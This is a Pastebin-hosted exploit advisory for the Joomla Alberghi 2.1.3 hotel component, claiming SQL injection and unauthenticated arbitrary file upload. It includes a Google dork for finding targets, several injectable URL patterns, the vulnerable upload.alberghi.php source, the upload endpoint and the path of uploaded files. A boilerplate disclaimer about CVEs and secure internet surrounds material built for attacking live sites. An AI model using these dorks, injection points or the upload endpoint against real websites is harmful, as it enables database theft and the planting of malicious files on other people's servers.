Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : Joomla Alberghi Components 2.1.3 SQL Injection / Remote File Upload
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 27/02/2019
- # Vendor Homepage : alberghi.joomlaitalia.com
- # Software Download Links : alberghi.joomlaitalia.com/files/alberghi_2_1_3_SR.zip
- joomlaos.de/option,com_remository/Itemid,41/func,finishdown/id,2566.html
- # Software Information Links :
- joomlashow.it/directory/turismo/hotel-alberghi/
- joomlaportal.ru/news/extensions/components/1538-komponent-alberghi-2-1-3
- joomla.info.tr/joomla-dersleri/alberghi-213
- artio.net/de/e-shop/joomla-extensions/joomsef/joomsef-3-extensions/alberghi-joomsef-3-extension
- # Software Affected Versions : 2.1.1 and 2.1.3 and other previous versions
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium/High
- # Google Dorks : inurl:"/index.php?option=com_alberghi"
- # Vulnerability Types : CWE-89 [ Improper Neutralization of Special Elements
- used in an SQL Command ('SQL Injection') ]
- CWE-264 [ Permissions, Privileges, and Access Controls ]
- # Old Similar CVE : CVE-2008-1459
- cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1459
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description about Software :
- ***************************
- Joomla Alberghi is used for Hotels and Tourism websites service especially in Italy.
- ####################################################################
- Information about CVE Common Vulnerabilities and Exposures =>
- **********************************************************
- Note : CVE stands for Common Vulnerabilities and Exposures
- [Old Similar ] CVE doesn't mean copy-paste but they are original written by author in more details.
- It is a reference and proof of concept code - cve-identifier number - or whatever you call it.
- For example ; This Joomla exploits/vulnerabilities are very real and not fake.
- We support your products and software -
- so we don't want no vulnerabilities and we want secure internet.
- It is designed to allow vulnerability databases and other capabilities to be linked together,
- and to facilitate the comparison of security tools and service.
- According to the CVE website, a vulnerability is a mistake in software code that provides
- an attacker with direct access to a system or network.
- It could allow an attacker to pose as a super-user or system administrator with full access privileges.
- If an attacker gives somebody hacker's CVE doesn't mean that this is copy-paste exploit.
- CVE lists only publicly known vulnerabilities and exposures, which means
- skilled hackers likely know about them anyway.It takes much more work for an organization
- to protect its networks and fix all possible holes than it takes for a hacker to find
- a single vulnerability, exploit it, and compromise the network.
- There is growing agreement in the infosec community that sharing information is beneficial.
- This is reflected in the fact that the CVE Board and CNAs include key infosec organizations.
- CVE is a list of information security vulnerabilities and exposures that aims to provide
- common names for publicly known problems. The goal of CVE is to make it easier to
- share data across separate vulnerability capabilities (tools, repositories, and services)
- with this "common enumeration." Please visit cve.mitre.org/about/faqs.html for more information.
- ####################################################################
- # According to the CVE-2008-1459 =>
- ********************************
- SQL injection vulnerability in the Alberghi (com_alberghi) 2.1.3 and earlier component
- for Mambo and Joomla! allows remote attackers to execute arbitrary SQL commands
- via the id - itemid - catid - startpage parameters in a detail action to index.php.
- ####################################################################
- # Impact :
- ***********
- * Joomla Alberghi Components 2.1.3 [ and other versions ] component for Joomla is prone to an SQL-injection
- vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
- Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit l
- atent vulnerabilities in the underlying database. A remote attacker can send a specially crafted request t
- o the vulnerable application and execute arbitrary SQL commands in application`s database.
- Further exploitation of this vulnerability may result in unauthorized data manipulation.
- An attacker can exploit this issue using a browser.
- * On the other hand this software is prone to a vulnerability that lets attackers upload arbitrary files.
- The issue occurs because the application fails to adequately sanitize user-supplied input.
- An attacker may leverage this issue to upload arbitrary files to the affected computer - sites or servers.
- this can result in arbitrary code execution within the context of the vulnerable application.
- ###################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_alberghi&%253BItemid=[SQL Injection]
- /index.php?option=com_alberghi&task=detail&Itemid=[ID-NUMBER]&id=[SQL Injection]
- /index.php?option=com_alberghi&task=viewAlberghi&Itemid=[SQL Injection]&letter=All
- /index.php?option=com_alberghi&Itemid=&task=viewcategory&catid=[SQL Injection]
- /index.php?option=com_alberghi&task=detail&Itemid=[ID-NUMBER]&catid=[ID-NUMBER]&id=[SQL Injection]
- /index.php?option=com_alberghi&task=viewcategory&Itemid=&catid=[ID-NUMBER]&limitstart=[ID-NUMBER]&startpage=[SQL Injection]
- ####################################################################
- # Vulnerable Source Code : [ upload.alberghi.php ]
- *********************************************
- <html>
- <head>
- <title>Caricamento / Upload</title>
- <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
- </head>
- <body bgcolor="#ffffff">
- </body>
- </html>
- <?php
- // Check if logged in
- define( "_VALID_MOS", 1 );
- $mode = $_GET['mode'];
- if ( $mode == "" ){
- $mode="stories_root";
- }
- $directory = $_GET['directory'];
- if ( $directory == "" )
- {
- $directory = $_POST['directory'];
- $fileupload = $_POST['fileupload'];
- }
- $userfile2=(isset($_FILES['userfile']['tmp_name']) ? $_FILES['userfile']['tmp_name'] : "");
- $userfile_name=(isset($_FILES['userfile']['name']) ? $_FILES['userfile']['name'] : "");
- if ($userfile_name != "") {
- if ($directory!="") {
- if ( $mode == "stories_root" ) {
- $base_Dir = "../../../images/stories/$directory/";
- }else if ( $mode == "alberghi_root" ){
- $base_Dir = "../../../components/com_alberghi/$directory/";
- }
- echo "BASE DIR [ $base_Dir ]";
- } else {
- echo "<script>alert('Seleziona una directory'); document.location.href='upload.alberghi.php';</script>";
- }
- if (empty($userfile_name)) {
- echo "<script>alert('Seleziona un immagine da caricare'); document.location.href='upload.alberghi.php';</script>";
- }
- $filename = split("\.", $userfile_name);
- if (eregi("[^0-9a-zA-Z_]", $filename[0])) {
- echo "<script> alert('Il nome del file deve contenere solo caratteri alfanumerici senza spaziature - File name must have only alphabetical characters with no spaces.'); window.history.go(-1);</script>\n";
- exit();
- }
- if (file_exists($base_Dir.$userfile_name)) {
- echo "<script> alert('Una immagine chiamata $userfile_name esiste già - Image $userfile_name already exists.'); window.history.go(-1);</script>\n";
- exit();
- }
- if ((strcasecmp(substr($userfile_name,-4),".gif")) && (strcasecmp(substr($userfile_name,-4),".jpg")) && (strcasecmp(substr($userfile_name,-4),".png"))) {
- echo "<script>alert('Il file deve essere un gif, png o jpg - The file must be a gif, png or jpg'); window.history.go(-1);</script>\n";
- exit();
- }
- if (eregi(".pdf", $userfile_name) || eregi(".doc", $userfile_name) || eregi(".xls", $userfile_name) || eregi(".ppt", $userfile_name)) {
- if (!move_uploaded_file ($_FILES['userfile']['tmp_name'],$media_path.$_FILES['userfile']['name']) || !chmod($media_path.$_FILES['userfile']['name'],0777)) {
- /*echo "<script>alert('Caricamento di $userfile_name fallito'); window.history.go(-1);</script>\n";*/
- exit();
- }
- else {
- echo "<script>alert('Caricamento di $userfile_name avvenuto con successo - File $userfile_name has been successfully uploaded'); window.history.go(-1);</script>\n";
- exit();
- }
- } elseif (!move_uploaded_file ($_FILES['userfile']['tmp_name'],$base_Dir.$_FILES['userfile']['name']) || !chmod($base_Dir.$_FILES['userfile']['name'],0777)) {
- /*echo "<script>alert('Caricamento di $userfile_name fallito'); window.history.go(-1);</script>\n";*/
- exit();
- }
- else {
- echo "<script>alert('Caricamento di $userfile_name avvenuto con successo - File $userfile_name has been successfully uploaded'); window.history.go(-1);</script>\n";
- exit();
- }
- }
- ?>
- <?php echo "<?xml version=\"1.0\" encoding=\"iso-8859-1\"?".">"; ?>
- <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
- <html xmlns="http://www.w3.org/1999/xhtml">
- <head>
- <title>Carica un file</title>
- <style>
- .button {
- color : #666666;
- border : 1px solid #666666;
- background-color : #ffffff;
- margin-top : 0px;
- font-family : arial, helvetica, sans-serif;
- font-size : 9px;
- height : 10px
- height : 10px;
- width : 140px
- width : 140px;
- }
- .inputbox {
- font-size : 10px;
- border : 1px solid #666666;
- background-color : #ffffff;
- margin-bottom : 5px;
- color : #666666;
- padding : 1px;
- }
- .title {
- font-family : Arial, Helvetica, sans-serif;
- font-size : 12px;
- color : #004080;
- }
- </style>
- </head>
- <body>
- <table border=0 topmargin=0 bgcolor=FFFFFF cellpadding=2 cellspacing=0 align="center">
- <form method="post" action="<?php $_SERVER['PHP_SELF'] ?>" enctype="multipart/form-data" name="filename">
- <tr>
- <th class="title"> Carica File / Upload File : <?php echo $directory; ?></th>
- </tr>
- <tr>
- <td align="center">
- <input class="inputbox" name="userfile" type="file" />
- </td>
- </tr>
- <tr>
- <td>
- <input class="button" type="submit" value="Carica / Upload" name="fileupload" />
- </td>
- <tr>
- <td>
- <input type="hidden" name="directory" value="<?echo $directory;?>" />
- </td>
- </tr>
- </form>
- </table>
- </body>
- </html>
- ####################################################################
- # Arbitrary Remote File Upload Exploit :
- ***********************************
- /administrator/components/com_alberghi/upload.alberghi.php
- # Vulnerability Error :
- *******************
- Seleziona un immagine da caricare
- alert('Seleziona una directory'); document.location.href='upload.alberghi.php';"; } if (empty($userfile_name)) { echo "
- # Directory File Path :
- ******************
- /administrator/components/com_alberghi/[YOURFILENAME].png .gif .jpg .jpeg
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement